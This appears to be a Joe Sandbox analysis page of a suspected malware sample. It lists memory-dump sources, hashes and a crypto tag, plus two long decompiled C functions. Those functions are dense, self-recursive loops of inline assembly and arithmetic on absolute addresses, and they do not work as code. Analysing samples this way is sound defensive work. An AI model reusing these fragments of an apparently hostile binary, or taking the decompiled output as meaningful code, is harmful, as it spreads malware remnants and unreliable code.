Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction ID: 7c98713e811ffec1c435ad361e458ca92b5d39f6397a55300cb108d8b1d59546
Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction Fuzzy Hash: CA021CB6E006189FDB54CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80

Uniqueness

Uniqueness Score: -1.00%

Function 0039EB5F Relevance: 1.5, Strings: 1, Instructions: 279
COMMONCrypto

Download Yara Rule

C-Code - Quality: 43%

			E0039EB5F(signed char __ebx, signed int __ecx, signed int __edx, void* __esi) {
				char _v3;
				void* _v5;
				signed int _t36;
				signed int _t37;
				signed int _t41;
				signed int _t43;
				signed int _t44;
				void* _t45;
				signed int _t61;
				signed int _t63;
				signed int _t69;
				signed int _t73;
				signed int _t88;
				char* _t91;
				signed int _t92;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t101;

				_t83 = __esi;
				_t69 = __edx;
				_t61 = __ecx;
				_t52 = __ebx;
				_t88 = _t92;
				goto L1;
				do {
					do {
						do {
							do {
								do {
									do {
										do {
											do {
												do {
													do {
														do {
															do {
																do {
																	do {
																		do {
																			do {
																				do {
																					do {
																						do {
																							do {
																								do {
																									L1:
																									asm("rcr dword [0x1926d0cc], 0x2");
																									asm("adc al, [0x24680be1]");
																									_t61 = _t61 -  *0xc8617cf6;
																									_push( *0x90b3d699);
																								} while (_t61 >= 0);
																								_t93 =  *0x2d9e7c7d * 0x9001;
																								 *0x663386e4 =  *0x663386e4 - _t69;
																								_t61 = _t61 & 0x000000a0;
																								asm("ror dword [0xf4b8683e], 0x4f");
																								asm("rol dword [0x1fd41a17], 0xe4");
																								asm("adc ebp, [0x4b5a13d8]");
																								_t52 = _t52 + 0x00000001 |  *0x949f5ac9;
																								asm("adc ah, [0xa8f58914]");
																								 *0x84b938d8 =  *0x84b938d8 ^ _t88;
																							} while ( *0x84b938d8 == 0);
																							asm("rcl dword [0xc3b7a474], 0xd1");
																							 *0xc137a826 =  *0xc137a826 - _t83;
																							asm("adc dl, 0x30");
																							asm("sbb ebx, [0x3547a339]");
																							asm("adc esp, 0x98a36087");
																						} while ( *0xc137a826 < 0);
																						asm("adc [0xadfaa672], ebp");
																						asm("sbb ebp, [0xca37ff21]");
																						_t83 = 0xb2b0438c;
																						 *0xe57b1aa8 = _t61;
																						_push( *0xce2d1089);
																						asm("sbb dl, [0xa590613c]");
																						asm("sbb esi, [0xd25595d5]");
																						_push( *0x7b0b06ed);
																						_t52 = _t52 -  *0xd85fd9c7 | 0x000000c6;
																					} while (_t52 >= 0);
																					_t88 =  *0xe31cdf7d * 0x2d7a;
																					_t69 = _t69 +  *0x750e82 - 1;
																				} while (_t69 < 0);
																				_t61 = _t61 -  *0x48825112;
																			} while (_t93 -  *0x5971fed6 < 0);
																			 *0x7ac4b8f6 =  *0x7ac4b8f6 >> 0x6d;
																			asm("scasb");
																			asm("rcl dword [0x5b7310a3], 0x46");
																			 *0xc6db26c9 =  *0xc6db26c9 >> 0xb1;
																			 *0x5f863184 =  *0x5f863184 - _t69;
																			 *0xcf69feee =  *0xcf69feee | 0xb2b0438c;
																		} while ( *0xcf69feee >= 0);
																		_t36 =  *0x23cd2c7d * 0x976e;
																		 *0xf11954d7 =  *0xf11954d7 & _t69;
																		_t95 =  *0x8f922f60 * 0x74b9;
																		_t5 = _t52;
																		_t52 =  *0xe9b4f367;
																		 *0xe9b4f367 = _t5;
																	} while (_t95 >= 0);
																	asm("sbb [0x28f7c71], ecx");
																	 *0xbb5876b1 =  *0xbb5876b1 >> 3;
																	asm("sbb ebp, 0xaae5569b");
																	_t96 = _t95 ^ 0xc61f848c;
																	_t61 = _t61 + 0xb0;
																	_pop(_t52);
																	 *0xb52d5ad0 =  *0xb52d5ad0 - _t69;
																	_t37 = _t36 |  *0xc91f48f7;
																	asm("adc edi, [0xd5b77333]");
																	asm("adc ebp, [0x4ee9bfd]");
																	 *0x6bf6ce68 =  *0x6bf6ce68 | _t37;
																} while ( *0x6bf6ce68 < 0);
																_t88 =  *0x911f3e7c * 0xf811;
																asm("adc [0xcda9c99], edx");
																 *0xd58598c0 = _t61;
																asm("adc dh, 0x1a");
																_t69 = _t69 + 0xffffffffe7db8bb7;
																 *0xdf613201 = _t96;
																 *0x33643d92 =  *0x33643d92 - ( *0xc39d4f6b * 0x0000358d |  *0x443cf333);
																asm("sbb [0x1dfa5420], cl");
																 *0x64bdd7ed =  *0x64bdd7ed << 0x1c;
															} while ( *0x64bdd7ed >= 0);
															 *0xd361b479 =  *0xd361b479 >> 0xbe;
															_t61 = _t61 |  *0xc540ee96;
															_t52 = _t52 -  *0x7e27d5cd;
															asm("rcl byte [0x7f59a808], 0x9e");
															 *0x1102e93c =  *0x1102e93c - _t69;
															asm("rcl dword [0xc7ae89ea], 0xf3");
														} while ( *0x1102e93c <= 0);
														 *0xb7c81e76 =  *0xb7c81e76 + _t96;
														asm("rcl dword [0x7679d96e], 0x4f");
														 *0x61087a8a =  *0x61087a8a << 0x7f;
														 *0x52215eda =  *0x52215eda | _t52;
														 *0x221f5618 =  *0x221f5618 - _t69;
														asm("rcl dword [0x9a0af395], 0xbf");
														_t61 = _t88;
														asm("ror byte [0xa6adc0d2], 0xb2");
														_t69 = _t69 -  *0x8596d93;
														 *0xa9b87b17 =  *0xa9b87b17 >> 0x23;
														_t88 = _t88 & 0x33ef9b9e;
														_t83 = 0xffffffffb2b0438e;
														 *0xf041d427 =  *0xf041d427 ^ _t88;
														_push( *0xb57018a1);
														asm("rcl dword [0xa4d24b87], 0x4c");
														asm("rcr dword [0xdb6b1cd8], 0x4b");
														 *0x35777ed1 =  *0x35777ed1 ^ _t37;
														asm("adc [0x98e3dc16], edx");
														asm("rol dword [0xda94df07], 0x9e");
														_t52 =  *0xbf8e54c2 ^ 0x0000001c;
														 *0x8b3b6d91 =  *0x8b3b6d91 >> 0xe8;
													} while ((_t37 |  *0xe2a0629d) != 0);
													_t52 = _t52 -  *0x33ebfb7a;
													_t10 = _t69 +  *0x2f12440f;
													_t69 =  *0x8c96c18;
													 *0x8c96c18 = _t10;
													_t63 =  *0x1073d09 ^  *0x501c25b8;
													_t88 = 0x3844526f;
													asm("cmpsw");
													asm("sbb al, [0x6962bcd2]");
													 *0xdb80ed6e =  *0xdb80ed6e + _t63;
													asm("sbb esi, [0xf225e0db]");
													_pop(_t41);
													asm("sbb al, [0x77a5bbf2]");
													_pop(_t101);
													_t61 = _t63 +  *0x23384916 + 1;
													asm("lodsb");
												} while (_t61 > 0);
												_t88 =  *0xc533157f * 0x3b43;
											} while ((_t101 ^  *0xed25e0d9) != 0);
											asm("rol dword [0x6761b87b], 0x1e");
											asm("scasb");
											_t88 =  &_v3;
											_t61 = _t61 ^ 0xb39593ce;
											_t69 = _t69 | 0x1c7e11c8;
											_t43 = _t41 &  *0x3eea7e9b |  *0x9ed205d5;
											_push(_t88);
											asm("sbb bh, 0xb7");
											asm("movsb");
											 *0x254963a3 =  *0x254963a3 - _t43;
											 *0xab61ba22 =  *0xab61ba22 | _t61;
											 *0xffe1a7de =  *0xffe1a7de >> 0x48;
											_t52 = 0xf1;
											 *0x6f0dd8e1 = _t69;
										} while (0xf1 != 0);
										 *0xef2cbe7a =  *0xef2cbe7a - _t88;
										_t69 = _t69 - 0xb938b717;
										_t61 = _t61 -  *0xce2587fe +  *0x6a71e225;
										_push(_t69);
									} while (_t61 != 0);
									_t61 = _t61 ^  *0x89e04b75;
									asm("adc ch, 0xe4");
									_t44 = _t43 ^  *0x73ec6fc4;
									 *0x75b00ec2 =  *0x75b00ec2 << 0x46;
								} while ( *0x75b00ec2 <= 0);
								 *0xcd0ced76 =  *0xcd0ced76 & 0xf1;
								_push( *0xd4d120df);
								_t73 = _t69 ^  *0x8ce1f464;
								_t45 = _t44 - 1;
								asm("ror byte [0x878fe3], 0xe1");
								asm("scasd");
								 *0x1639dabc =  *0x68efdc60 * 0xadd6;
								asm("rcr byte [0x54942e24], 0x3c");
								 *0x1f0b9e8d =  *0x1f0b9e8d | _t73;
								_t52 = (0xf1 |  *0xb80842fb) + 0xe0;
								 *0x37c44cf8 =  *0x37c44cf8 - _t45;
								_t69 = _t73 +  *0x32973d1d;
								 *0xb763939e =  *0xb763939e >> 0x42;
							} while (_t69 >= 0);
							 *0xeb5c9437 =  *0xeb5c9437 + _t45;
							asm("rcl dword [0x38d4a393], 0x77");
							asm("sbb eax, 0xfce6b2d1");
							_t88 = 0x5a73a3f4;
							asm("rcl dword [0xeae9a79f], 0xd6");
							_t83 = 0xffffffffb2b0438e -  *0x13b0c162;
							_t69 = _t69 + 1;
						} while (( *0x9bb3e420 & _t61) >= 0);
						 *0xa528d679 =  *0xa528d679 >> 0xe4;
						 *0x61cf7d7 =  *0x61cf7d7 ^ _t52;
						asm("a16 dec ebp");
						_t88 =  &_v3;
						asm("sbb [0xca6f60ce], ebx");
						_t61 =  *0x42672f63 +  *0x5f7886ec - 0xf675de09;
						asm("scasd");
						_t52 = _t52;
					} while (_t52 + 0xe5 < 0);
					asm("sbb esp, 0x750d85ea");
					L1();
					 *0x18fc16e8 =  *0x18fc16e8 >> 0x44;
					asm("rcl byte [0x9fbc8e12], 0xc6");
					_t88 =  &_v5 ^ 0xb443ffdc;
					asm("adc eax, [0xd78df39b]");
					 *0x42f6ec12 =  *0x42f6ec12 - 0xffffffffffffff04;
					asm("sbb ecx, [0x1e330fcb]");
				} while (0x88 >= 0x2a);
				 *0x99185171 = _t88;
				 *0x8243ecfd =  *0x8243ecfd + 0xffffffffffffff04;
				asm("adc ecx, 0xdb79ca66");
				asm("adc [0xdf8cf9e5], bh");
				 *0x3d7fffd8 =  *0x3d7fffd8 - _t61 -  *0xf0afc732;
				asm("ror dword [0x7a23fb97], 0xa2");
				_pop( *0x7e4569ed);
				asm("adc [0x5580d91d], ebx");
				_push(0xe9add88c);
				_t91 =  &_v3;
				 *0x9b16143b = _t91;
				 *0x8f4a19b4 =  *0x8f4a19b4 >> 0x24;
				asm("sbb [0x9cc75697], esi");
				asm("ror byte [0x487d6aa2], 0xc8");
				asm("adc ch, [0xd63a601a]");
				 *0xe1b52868 = _t91;
				asm("sbb [0xdc0e3df8], esi");
				return 0xffffffffffffff0f;
			}

0x0039eb5f
0x0039eb5f
0x0039eb5f
0x0039eb5f
0x0039eb60
0x0039eb60
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb69
0x0039eb6f
0x0039eb75
0x0039eb75
0x0039eb7d
0x0039eb87
0x0039eb95
0x0039eb99
0x0039eba0
0x0039eba7
0x0039ebad
0x0039ebb3
0x0039ebb9
0x0039ebb9
0x0039ebc1
0x0039ebc8
0x0039ebce
0x0039ebd1
0x0039ebd7
0x0039ebd7
0x0039ebdf
0x0039ebea
0x0039ebf0
0x0039ebf5
0x0039ebfb
0x0039ec01
0x0039ec07
0x0039ec13
0x0039ec19
0x0039ec19
0x0039ec22
0x0039ec32
0x0039ec32
0x0039ec3e
0x0039ec44
0x0039ec5a
0x0039ec61
0x0039ec68
0x0039ec6f
0x0039ec76
0x0039ec7c
0x0039ec7c
0x0039ec88
0x0039ec92
0x0039ec98
0x0039eca2
0x0039eca2
0x0039eca2
0x0039eca2
0x0039ecae
0x0039ecbf
0x0039ecc6
0x0039eccc
0x0039ecd2
0x0039ecdb
0x0039ecdc
0x0039ece2
0x0039ece8
0x0039ecee
0x0039ecf4
0x0039ecf4
0x0039ed00
0x0039ed0a
0x0039ed13
0x0039ed23
0x0039ed2c
0x0039ed32
0x0039ed38
0x0039ed3e
0x0039ed44
0x0039ed44
0x0039ed51
0x0039ed58
0x0039ed5e
0x0039ed64
0x0039ed6b
0x0039ed71
0x0039ed71
0x0039ed7e
0x0039ed8b
0x0039ed92
0x0039ed99
0x0039eda5
0x0039edab
0x0039edb2
0x0039edb3
0x0039edbb
0x0039edc1
0x0039edce
0x0039edd7
0x0039edd8
0x0039edde
0x0039ede4
0x0039edeb
0x0039edf8
0x0039ee04
0x0039ee0a
0x0039ee12
0x0039ee1c
0x0039ee23
0x0039ee2f
0x0039ee41
0x0039ee41
0x0039ee41
0x0039ee47
0x0039ee53
0x0039ee5a
0x0039ee5e
0x0039ee64
0x0039ee6a
0x0039ee76
0x0039ee77
0x0039ee7d
0x0039ee7e
0x0039ee7f
0x0039ee7f
0x0039ee86
0x0039ee90
0x0039ee9c
0x0039eea3
0x0039eea4
0x0039eeab
0x0039eeb1
0x0039eebd
0x0039eec3
0x0039eec4
0x0039eec7
0x0039eec8
0x0039eece
0x0039eed6
0x0039eedd
0x0039eede
0x0039eede
0x0039eeea
0x0039eef6
0x0039ef02
0x0039ef08
0x0039ef08
0x0039ef0f
0x0039ef15
0x0039ef24
0x0039ef2b
0x0039ef2b
0x0039ef38
0x0039ef44
0x0039ef4a
0x0039ef66
0x0039ef67
0x0039ef6e
0x0039ef6f
0x0039ef75
0x0039ef82
0x0039ef88
0x0039ef97
0x0039ef9d
0x0039efa3
0x0039efa3
0x0039efb6
0x0039efbc
0x0039efc3
0x0039efce
0x0039efd3
0x0039efda
0x0039efe0
0x0039efe4
0x0039eff0
0x0039eff7
0x0039f002
0x0039f011
0x0039f01e
0x0039f025
0x0039f02b
0x0039f02f
0x0039f02f
0x0039f03c
0x0039f044
0x0039f049
0x0039f050
0x0039f057
0x0039f05d
0x0039f063
0x0039f06b
0x0039f06b
0x0039f077
0x0039f07d
0x0039f089
0x0039f08f
0x0039f0b3
0x0039f0b9
0x0039f0c0
0x0039f0c6
0x0039f0cc
0x0039f0d4
0x0039f0d5
0x0039f0db
0x0039f0ef
0x0039f0f6
0x0039f0fd
0x0039f103
0x0039f109
0x0039f111

Strings

oRD8, xrefs: 0039EE53

Memory Dump Source

Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID:
String ID: oRD8
API String ID: 0-2435772424
Opcode ID: 3ccc48051c45ae8eb0bdd5c25ed5c6fb4127e76a861f9f2451771d79ee3da230
Instruction ID: 1ab930881535956a8d0fbbe35cdab4942be05adaf2d7944d93492490a90f67da
Opcode Fuzzy Hash: 3ccc48051c45ae8eb0bdd5c25ed5c6fb4127e76a861f9f2451771d79ee3da230
Instruction Fuzzy Hash: 69D1A832818785CFEB16EF39D99A7453FB0F756734B08028EC8A283592DB742566CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0039EB62 Relevance: 1.5, Strings: 1, Instructions: 239
COMMONCrypto

Download Yara Rule

C-Code - Quality: 42%

			E0039EB62(void* __ebx, void* __ecx, void* __edx, void* __esi) {
				signed int _t36;
				signed int _t37;
				signed int _t41;
				signed int _t43;
				signed int _t44;
				void* _t45;
				signed char _t51;
				signed char _t55;
				signed char _t57;
				void* _t60;
				signed int _t61;
				signed char _t69;
				void* _t71;
				signed char _t73;
				signed char _t74;
				void* _t75;
				intOrPtr _t76;
				signed int _t80;
				signed int _t82;
				signed char _t83;
				signed int _t85;
				signed int _t86;
				void* _t89;
				signed char _t93;
				void* _t95;
				void* _t96;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				void* _t102;
				void* _t103;
				void* _t117;
				signed int _t120;
				signed int _t122;
				signed int _t125;
				void* _t126;
				intOrPtr _t132;
				signed int _t133;
				signed int _t135;
				signed int _t136;
				signed int _t141;

				L0:
				do {
					do {
						do {
							do {
								do {
									do {
										do {
											do {
												do {
													do {
														do {
															do {
																do {
																	do {
																		do {
																			do {
																				do {
																					do {
																						do {
																							do {
																								L0:
																								asm("rcr dword [0x1926d0cc], 0x2");
																								asm("adc al, [0x24680be1]");
																								_t73 = __ecx -  *0xc8617cf6;
																								_push( *0x90b3d699);
																								if(_t73 >= 0) {
																									continue;
																								}
																								L1:
																								_t133 =  *0x2d9e7c7d * 0x9001;
																								 *0x663386e4 =  *0x663386e4 - __edx;
																								_t74 = _t73 & 0x000000a0;
																								asm("ror dword [0xf4b8683e], 0x4f");
																								asm("rol dword [0x1fd41a17], 0xe4");
																								asm("adc ebp, [0x4b5a13d8]");
																								_t55 = __ebx + 0x00000001 |  *0x949f5ac9;
																								asm("adc ah, [0xa8f58914]");
																								 *0x84b938d8 =  *0x84b938d8 ^ _t120;
																							} while ( *0x84b938d8 == 0);
																							L2:
																							asm("rcl dword [0xc3b7a474], 0xd1");
																							 *0xc137a826 =  *0xc137a826 - __esi;
																							asm("adc dl, 0x30");
																							asm("sbb ebx, [0x3547a339]");
																							asm("adc esp, 0x98a36087");
																						} while ( *0xc137a826 < 0);
																						L3:
																						asm("adc [0xadfaa672], ebp");
																						asm("sbb ebp, [0xca37ff21]");
																						 *0xe57b1aa8 = _t74;
																						_push( *0xce2d1089);
																						asm("sbb dl, [0xa590613c]");
																						asm("sbb esi, [0xd25595d5]");
																						_push( *0x7b0b06ed);
																						_t57 = _t55 -  *0xd85fd9c7 | 0x000000c6;
																					} while (_t57 >= 0);
																					L4:
																					_t93 = __edx +  *0x750e82 - 1;
																				} while (_t93 < 0);
																				L5:
																				_t75 = _t74 -  *0x48825112;
																			} while (_t133 -  *0x5971fed6 < 0);
																			L6:
																			 *0x7ac4b8f6 =  *0x7ac4b8f6 >> 0x6d;
																			asm("scasb");
																			asm("rcl dword [0x5b7310a3], 0x46");
																			 *0xc6db26c9 =  *0xc6db26c9 >> 0xb1;
																			 *0x5f863184 =  *0x5f863184 - _t93;
																			 *0xcf69feee =  *0xcf69feee | 0xb2b0438c;
																		} while ( *0xcf69feee >= 0);
																		L7:
																		_t36 =  *0x23cd2c7d * 0x976e;
																		 *0xf11954d7 =  *0xf11954d7 & _t93;
																		_t135 =  *0x8f922f60 * 0x74b9;
																		 *0xe9b4f367 = _t57;
																	} while (_t135 >= 0);
																	L8:
																	asm("sbb [0x28f7c71], ecx");
																	 *0xbb5876b1 =  *0xbb5876b1 >> 3;
																	asm("sbb ebp, 0xaae5569b");
																	_t136 = _t135 ^ 0xc61f848c;
																	_t76 = _t75 + 0xb0;
																	_pop(_t60);
																	 *0xb52d5ad0 =  *0xb52d5ad0 - _t93;
																	_t37 = _t36 |  *0xc91f48f7;
																	asm("adc edi, [0xd5b77333]");
																	asm("adc ebp, [0x4ee9bfd]");
																	 *0x6bf6ce68 =  *0x6bf6ce68 | _t37;
																} while ( *0x6bf6ce68 < 0);
																L9:
																_t122 =  *0x911f3e7c * 0xf811;
																asm("adc [0xcda9c99], edx");
																 *0xd58598c0 = _t76;
																asm("adc dh, 0x1a");
																_t95 = _t93 + 0xffffffffe7db8bb7;
																 *0xdf613201 = _t136;
																 *0x33643d92 =  *0x33643d92 - ( *0xc39d4f6b * 0x0000358d |  *0x443cf333);
																asm("sbb [0x1dfa5420], cl");
																 *0x64bdd7ed =  *0x64bdd7ed << 0x1c;
															} while ( *0x64bdd7ed >= 0);
															L10:
															 *0xd361b479 =  *0xd361b479 >> 0xbe;
															_t61 = _t60 -  *0x7e27d5cd;
															asm("rcl byte [0x7f59a808], 0x9e");
															 *0x1102e93c =  *0x1102e93c - _t95;
															asm("rcl dword [0xc7ae89ea], 0xf3");
														} while ( *0x1102e93c <= 0);
														L11:
														 *0xb7c81e76 =  *0xb7c81e76 + _t136;
														_push(_t122);
														asm("rcl dword [0x7679d96e], 0x4f");
														 *0x61087a8a =  *0x61087a8a << 0x7f;
														 *0x52215eda =  *0x52215eda | _t61;
														 *0x221f5618 =  *0x221f5618 - _t95;
														asm("rcl dword [0x9a0af395], 0xbf");
														asm("ror byte [0xa6adc0d2], 0xb2");
														_t96 = _t95 -  *0x8596d93;
														 *0xa9b87b17 =  *0xa9b87b17 >> 0x23;
														 *0xf041d427 =  *0xf041d427 ^ _t122 & 0x33ef9b9e;
														_push( *0xb57018a1);
														asm("rcl dword [0xa4d24b87], 0x4c");
														asm("rcr dword [0xdb6b1cd8], 0x4b");
														 *0x35777ed1 =  *0x35777ed1 ^ _t37;
														asm("adc [0x98e3dc16], edx");
														asm("rol dword [0xda94df07], 0x9e");
														 *0x8b3b6d91 =  *0x8b3b6d91 >> 0xe8;
													} while ((_t37 |  *0xe2a0629d) != 0);
													L12:
													_t98 =  *0x8c96c18;
													 *0x8c96c18 = _t96 +  *0x2f12440f;
													_t80 =  *0x1073d09 ^  *0x501c25b8;
													asm("cmpsw");
													asm("sbb al, [0x6962bcd2]");
													 *0xdb80ed6e =  *0xdb80ed6e + _t80;
													asm("sbb esi, [0xf225e0db]");
													_pop(_t41);
													asm("sbb al, [0x77a5bbf2]");
													_pop(_t141);
													_t82 = _t80 +  *0x23384916 + 1;
													asm("lodsb");
												} while (_t82 > 0);
												L13:
												_t125 =  *0xc533157f * 0x3b43;
											} while ((_t141 ^  *0xed25e0d9) != 0);
											L14:
											asm("rol dword [0x6761b87b], 0x1e");
											asm("scasb");
											_t126 = _t125 + 1;
											_t83 = _t82 ^ 0xb39593ce;
											_t99 = _t98 | 0x1c7e11c8;
											_t43 = _t41 &  *0x3eea7e9b |  *0x9ed205d5;
											_push(_t126);
											asm("sbb bh, 0xb7");
											asm("movsb");
											 *0x254963a3 =  *0x254963a3 - _t43;
											 *0xab61ba22 =  *0xab61ba22 | _t83;
											 *0xffe1a7de =  *0xffe1a7de >> 0x48;
											 *0x6f0dd8e1 = _t99;
										} while (0xf1 != 0);
										L15:
										 *0xef2cbe7a =  *0xef2cbe7a - _t126;
										_t100 = _t99 - 0xb938b717;
										_t85 = _t83 -  *0xce2587fe +  *0x6a71e225;
										_push(_t100);
									} while (_t85 != 0);
									L16:
									_t86 = _t85 ^  *0x89e04b75;
									asm("adc ch, 0xe4");
									_t44 = _t43 ^  *0x73ec6fc4;
									 *0x75b00ec2 =  *0x75b00ec2 << 0x46;
								} while ( *0x75b00ec2 <= 0);
								L17:
								 *0xcd0ced76 =  *0xcd0ced76 & 0xf1;
								_push( *0xd4d120df);
								_t101 = _t100 ^  *0x8ce1f464;
								_t45 = _t44 - 1;
								asm("ror byte [0x878fe3], 0xe1");
								asm("scasd");
								 *0x1639dabc =  *0x68efdc60 * 0xadd6;
								asm("rcr byte [0x54942e24], 0x3c");
								 *0x1f0b9e8d =  *0x1f0b9e8d | _t101;
								_t69 = (0xf1 |  *0xb80842fb) + 0xe0;
								 *0x37c44cf8 =  *0x37c44cf8 - _t45;
								_t102 = _t101 +  *0x32973d1d;
								 *0xb763939e =  *0xb763939e >> 0x42;
							} while (_t102 >= 0);
							L18:
							 *0xeb5c9437 =  *0xeb5c9437 + _t45;
							asm("rcl dword [0x38d4a393], 0x77");
							asm("sbb eax, 0xfce6b2d1");
							asm("rcl dword [0xeae9a79f], 0xd6");
							_t117 = 0xffffffffb2b0438e -  *0x13b0c162;
							_t103 = _t102 + 1;
						} while (( *0x9bb3e420 & _t86) >= 0);
						 *0xa528d679 =  *0xa528d679 >> 0xe4;
						 *0x61cf7d7 =  *0x61cf7d7 ^ _t69;
						L20:
						asm("a16 dec ebp");
						asm("sbb [0xca6f60ce], ebx");
						_t89 =  *0x42672f63 +  *0x5f7886ec - 0xf675de09;
						asm("scasd");
						_t71 = _t69;
					} while (_t69 + 0xe5 < 0);
					L21:
					asm("sbb esp, 0x750d85ea");
					_t51 = E0039EB62(_t71, _t89, _t103, _t117);
					 *0x18fc16e8 =  *0x18fc16e8 >> 0x44;
					asm("rcl byte [0x9fbc8e12], 0xc6");
					asm("adc eax, [0xd78df39b]");
					 *0x42f6ec12 =  *0x42f6ec12 - _t51;
					asm("sbb ecx, [0x1e330fcb]");
				} while (0x88 >= 0x2a);
				 *0x99185171 = 0xffffffffee305c28;
				 *0x8243ecfd =  *0x8243ecfd + _t51;
				asm("adc ecx, 0xdb79ca66");
				asm("adc [0xdf8cf9e5], bh");
				 *0x3d7fffd8 =  *0x3d7fffd8 - _t89 -  *0xf0afc732;
				asm("ror dword [0x7a23fb97], 0xa2");
				_pop( *0x7e4569ed);
				asm("adc [0x5580d91d], ebx");
				_push(0xe9add88c);
				_t132 =  *0x99185171 + 1;
				 *0x9b16143b = _t132;
				 *0x8f4a19b4 =  *0x8f4a19b4 >> 0x24;
				asm("sbb [0x9cc75697], esi");
				asm("ror byte [0x487d6aa2], 0xc8");
				asm("adc ch, [0xd63a601a]");
				 *0xe1b52868 = _t132;
				asm("sbb [0xdc0e3df8], esi");
				return _t51 | 0x0000000b;
			}

0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb62
0x0039eb69
0x0039eb6f
0x0039eb75
0x0039eb7b
0x00000000
0x00000000
0x0039eb7d
0x0039eb7d
0x0039eb87
0x0039eb95
0x0039eb99
0x0039eba0
0x0039eba7
0x0039ebad
0x0039ebb3
0x0039ebb9
0x0039ebb9
0x0039ebc1
0x0039ebc1
0x0039ebc8
0x0039ebce
0x0039ebd1
0x0039ebd7
0x0039ebd7
0x0039ebdf
0x0039ebdf
0x0039ebea
0x0039ebf5
0x0039ebfb
0x0039ec01
0x0039ec07
0x0039ec13
0x0039ec19
0x0039ec19
0x0039ec22
0x0039ec32
0x0039ec32
0x0039ec39
0x0039ec3e
0x0039ec44
0x0039ec50
0x0039ec5a
0x0039ec61
0x0039ec68
0x0039ec6f
0x0039ec76
0x0039ec7c
0x0039ec7c
0x0039ec88
0x0039ec88
0x0039ec92
0x0039ec98
0x0039eca2
0x0039eca2
0x0039ecae
0x0039ecae
0x0039ecbf
0x0039ecc6
0x0039eccc
0x0039ecd2
0x0039ecdb
0x0039ecdc
0x0039ece2
0x0039ece8
0x0039ecee
0x0039ecf4
0x0039ecf4
0x0039ed00
0x0039ed00
0x0039ed0a
0x0039ed13
0x0039ed23
0x0039ed2c
0x0039ed32
0x0039ed38
0x0039ed3e
0x0039ed44
0x0039ed44
0x0039ed51
0x0039ed51
0x0039ed5e
0x0039ed64
0x0039ed6b
0x0039ed71
0x0039ed71
0x0039ed7e
0x0039ed7e
0x0039ed84
0x0039ed8b
0x0039ed92
0x0039ed99
0x0039eda5
0x0039edab
0x0039edb3
0x0039edbb
0x0039edc1
0x0039edd8
0x0039edde
0x0039ede4
0x0039edeb
0x0039edf8
0x0039ee04
0x0039ee0a
0x0039ee1c
0x0039ee23
0x0039ee2f
0x0039ee41
0x0039ee41
0x0039ee47
0x0039ee5a
0x0039ee5e
0x0039ee64
0x0039ee6a
0x0039ee76
0x0039ee77
0x0039ee7d
0x0039ee7e
0x0039ee7f
0x0039ee7f
0x0039ee86
0x0039ee86
0x0039ee90
0x0039ee9c
0x0039ee9c
0x0039eea3
0x0039eea4
0x0039eeab
0x0039eeb1
0x0039eebd
0x0039eec3
0x0039eec4
0x0039eec7
0x0039eec8
0x0039eece
0x0039eed6
0x0039eede
0x0039eede
0x0039eeea
0x0039eeea
0x0039eef6
0x0039ef02
0x0039ef08
0x0039ef08
0x0039ef0f
0x0039ef0f
0x0039ef15
0x0039ef24
0x0039ef2b
0x0039ef2b
0x0039ef38
0x0039ef38
0x0039ef44
0x0039ef4a
0x0039ef66
0x0039ef67
0x0039ef6e
0x0039ef6f
0x0039ef75
0x0039ef82
0x0039ef88
0x0039ef97
0x0039ef9d
0x0039efa3
0x0039efa3
0x0039efb0
0x0039efb6
0x0039efbc
0x0039efc3
0x0039efd3
0x0039efda
0x0039efe0
0x0039efe4
0x0039eff0
0x0039eff7
0x0039f000
0x0039f002
0x0039f01e
0x0039f025
0x0039f02b
0x0039f02f
0x0039f02f
0x0039f036
0x0039f03c
0x0039f044
0x0039f049
0x0039f050
0x0039f05d
0x0039f063
0x0039f06b
0x0039f06b
0x0039f077
0x0039f07d
0x0039f089
0x0039f08f
0x0039f0b3
0x0039f0b9
0x0039f0c0
0x0039f0c6
0x0039f0cc
0x0039f0d4
0x0039f0d5
0x0039f0db
0x0039f0ef
0x0039f0f6
0x0039f0fd
0x0039f103
0x0039f109
0x0039f111

Strings

oRD8, xrefs: 0039EE53

Memory Dump Source

Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

